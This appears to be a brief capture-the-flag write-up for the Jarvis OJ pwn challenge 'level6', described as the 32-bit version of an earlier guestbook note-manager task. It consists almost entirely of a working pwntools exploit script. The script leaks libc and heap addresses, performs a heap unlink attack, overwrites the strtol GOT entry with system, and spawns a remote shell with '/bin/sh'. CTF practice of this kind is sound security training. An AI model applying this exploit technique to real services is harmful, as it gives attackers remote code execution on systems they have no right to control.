nc pwn2.jarvisoj.com 9885
Hint1: 本题附件已更新,请大家重新下载以免影响解题。
level6.rar.69c5609dc9bab6c458b9c70d23e9445d
之前的guestbook2的32位版本
exp如下:
from pwn import * def list_note(): io.recvuntil('Your choice: ') io.sendline('1') def new_note(note): io.recvuntil('Your choice: ') io.sendline('2') io.recvuntil('Length of new note: ') io.sendline(str(len(note))) io.recvuntil('Enter your note: ') io.send(note) def edit_note(number, note): io.recvuntil('Your choice: ') io.sendline('3') io.recvuntil('Note number: ') io.sendline(str(number)) io.recvuntil('Length of note: ') io.sendline(str(len(note))) io.recvuntil('Enter your note: ') io.send(note) def delete_note(number): io.recvuntil('Your choice: ') io.sendline('4') io.recvuntil('Note number: ') io.sendline(str(number)) #io = process('./freenote_x86') #io = gdb.debug('./freenote_x86', 'b *0x8048760') io = remote('pwn2.jarvisoj.com', 9885) elf = ELF('./freenote_x86') #libc = elf.libc libc = ELF('./libc-2.19.so') strtol_got = 0x804A2BC new_note(b'a' * 128) new_note(b'b' * 128) new_note(b'c' * 128) new_note(b'd' * 128) new_note(b'e' * 128) delete_note(1) delete_note(3) edit_note(0, b'a' * 128 + b'b' * 8) list_note() io.recvuntil('b' * 8) libc_addr = u32(io.recv(4)) info("libc_addr:" + str(hex(libc_addr))) #libc_base = libc_addr - 0x1B3780 - 48 libc_base = libc_addr - 0x1AD420 - 48 info("libc_base:" + str(hex(libc_base))) system_addr = libc_base + libc.symbols['system'] info("system_addr:" + str(hex(system_addr))) edit_note(0, b'a' * 128 + b'b' * 12) list_note() io.recvuntil('b' * 12) heap_addr = u32(io.recv(4)) info("heap_addr:" + str(hex(heap_addr))) heap_base = heap_addr - 0xdb0 info("heap_base:" + str(hex(heap_base))) unlink_addr = heap_base + 0x18 info("unlink_addr:" + str(hex(unlink_addr))) payload = p32(0x88) + p32(0x80) + p32(unlink_addr - 12) + p32(unlink_addr - 8) payload = payload.ljust(0x80, b'\x00') payload += p32(0x80) + p32(0x88) payload = payload.ljust(0x80 * 2, b'\x00') edit_note(0, payload) delete_note(1) payload = p32(2) + p32(1) + p32(0x100) + p32(heap_addr + 0xc) + p32(1) + p32(4) + p32(strtol_got) payload = payload.ljust(0x80 * 2, b'\x00') edit_note(0, payload) edit_note(1, p32(system_addr)) io.recvuntil('Your choice: ') io.sendline('/bin/sh') io.interactive()